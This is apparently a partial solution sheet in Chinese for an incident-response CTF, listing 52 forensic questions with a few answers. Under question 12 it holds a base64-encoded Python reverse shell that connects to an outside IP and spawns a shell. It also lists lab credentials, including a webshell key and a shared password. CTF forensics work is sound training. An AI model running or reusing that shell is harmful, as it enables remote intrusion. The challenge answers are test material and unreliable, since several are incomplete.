一、背景信息 在这个跳跃的数字舞台上,数据安全成了政企单位稳航的重要压舱石。某政企单位,作为一艘驶向未来 的巨轮,对数据的把控丝毫不敢松懈。眼下,我们即将启航一场无与伦比的探险——“信息安全探索之 旅”。 这趟旅程的目的是遍访我们的信息系统每一个角落,探寻隐藏在暗处的风险海怪,提升船员们对数据宝 藏的守护意识,确保我们的珍贵资讯宝藏不被外界窥见,不受损害,随时准备发挥其价值。在这场航旅中, 某政企单位期望锻造一副更加坚不可摧的数据防护铠甲,增强面对意外风暴的航行能力。 你和你的团队,作为这次探险的领航员,将借助先进的应急响应罗盘,对我们的内部信息航道进行全域 的安全梳理。从网络的海洋到系统的天空,从数据库的深渊到应用的岛屿,无一处不在你们的巡航范围之 内。我们将特别防范那些潜伏的数据海盗——数据泄露、非法入侵、恶意攻击,以及物联网设备安全上的狂 风骤雨。 让我们携手共航,把这次“信息安全探索之旅”变成一个传奇,确保我们的信息系统像最强大的舰队领 航者一样,勇敢、可靠、无所畏惧。向着更安全的港湾,全速前进!
二、网络拓扑
三、资产清单
第一届帕鲁杯应急响应题目解题和思路
1.签到 提交:[堡垒机的flag标签的值]
2.提交攻击者第一次登录时间 格式为:[2024/00/00/00:00:00]
3.提交攻击者源IP 格式为:[0.0.0.0]
4.提交攻者使用的cve编号 格式为:[CVE-0000-0000]
5.提交攻击者留着web服务器上的恶意程序的32位小写md5 格式为:[xxxxxx]
6.分析恶意程序连接地址和密码 格式为:[md5(地址)-md5(密码)]全小写
7.提交存在反序列化漏洞的端口 格式为:[md5(端口)]
8.提交攻击者使用的后门路由地址 格式为:[md5(/api/xxx)]
9.提交dnslog反弹域名 格式为:[md5(域名)]
10.提交第一次扫描器使用时间 格式为:[2024/00/00/00:00:00]
11.提交攻击者反弹shell使用的语言 格式为:[md5(c++&java)]均为小写
12.提交攻击者反弹shell的ip 格式为:[xxx.xxx.xxx.xxx]
aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjgyLjE1Ny4yMzguMTc0Iiw3ODkwKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigic2giKQ==
13.提交攻击者留下的账号 格式为:[xxxxx]
14.提交攻击者的后门账户密码 格式为:[md5(password)]
15.提交测试数据条数 格式为[md5(xxx)]
16.请提交攻击者留下的信息 格式为:[xxxx]
17.请提交运维服务器上的恶意文件md5小写32 格式为:[xxxx]
18.提交恶意文件的恶意函数 格式为:[md5(恶意函数)]
19.请提交攻击者恶意注册的恶意用户条数 格式为:[md5(x)]
20.请提交对博客系统的第一次扫描时间 格式为:[2024/00/00/00:00:00]
21.提交攻击者下载的文件 格式为[xxxx.xxx]
22.请提交攻击者第一次下载的时间 格式为:[xx/Apr/2024:xx:xx:xx]
23.请提交攻击者留下的冰蝎马的文件名称 格式为:[xxxx]
24.提交冰蝎的链接密码 格式为:[xxx]
1be873048db838ac
25.提交办公区存在的恶意用户名 格式为:[xxx]
26.提交恶意用户密码到期时间 格式为:[xxxx]
27.请对办公区留存的镜像取证并指出内存疑似恶意进程 格式为:[xxxx]
28.请指出该员工使用的公司OA平台的密码 格式为:[xxxx]
29.攻击者传入一个木马文件并做了权限维持,请问木马文件名是什 么 格式为:[xxxx]
30.请提交该计算机中记录的重要联系人的家庭住址 格式为:[xxxxx]
31.请提交近源靶机上的恶意文件哈希 格式为:[xxx]
32.提交恶意程序的外联地址 格式为:[xxxxx]
33.提交攻击者使用内网扫描工具的哈希 格式为:[xxxx]
34.请提交攻击者在站点上留下的后门密码 格式为:[xxxx]
?123
35.请提交攻击者在数据库留下的信息 格式为:[xxxx]
36.提交攻击者在监控服务器上留下的dcnlog地址 格式为:[xxx.xx.xx]
37.提交监控服务器上恶意用户的上一次登录时间 格式为:[xx/xx/xx/xx:xx:xx]
38.提交监控服务器上遗留的反弹shell地址和端口 格式为:[xxxx:xx]
39.提交恶意钓鱼文件的哈希 格式为:[xxxx]
40.提交恶意文件外联IP 格式为:[xxx] (可能不对)
41.提交被恶意文件钓鱼使用者的姓名 格式为:[xxx]
42.提交攻击者留下的信息 格式为:[xxxx]
43.提交恶意用户数量 格式为:[md5(xxxx)]
44.请提交员工集体使用的密码 格式为:[xxxx]
Network@2020
45.提交加密文件的哈希 格式为:[xxxx]
46.提交被攻击者加密的内容明文 格式为:[xxxx]
[2024ispassword]
47.请提交符合基线标准的服务器数量 格式为:[md5(xx)]
0
48.提交办公区的恶意文件哈希 格式为:[xxx]
49.提交恶意回连端口 格式为:[xxx]
50.提交恶意程序中的falg 格式为:[xxx]
51.提交恶意文件中的search_for_text内容 格式为:[xxxx]
52.提交web服务器上攻击者修改后的root密码 格式为:[xxxx](这个我不会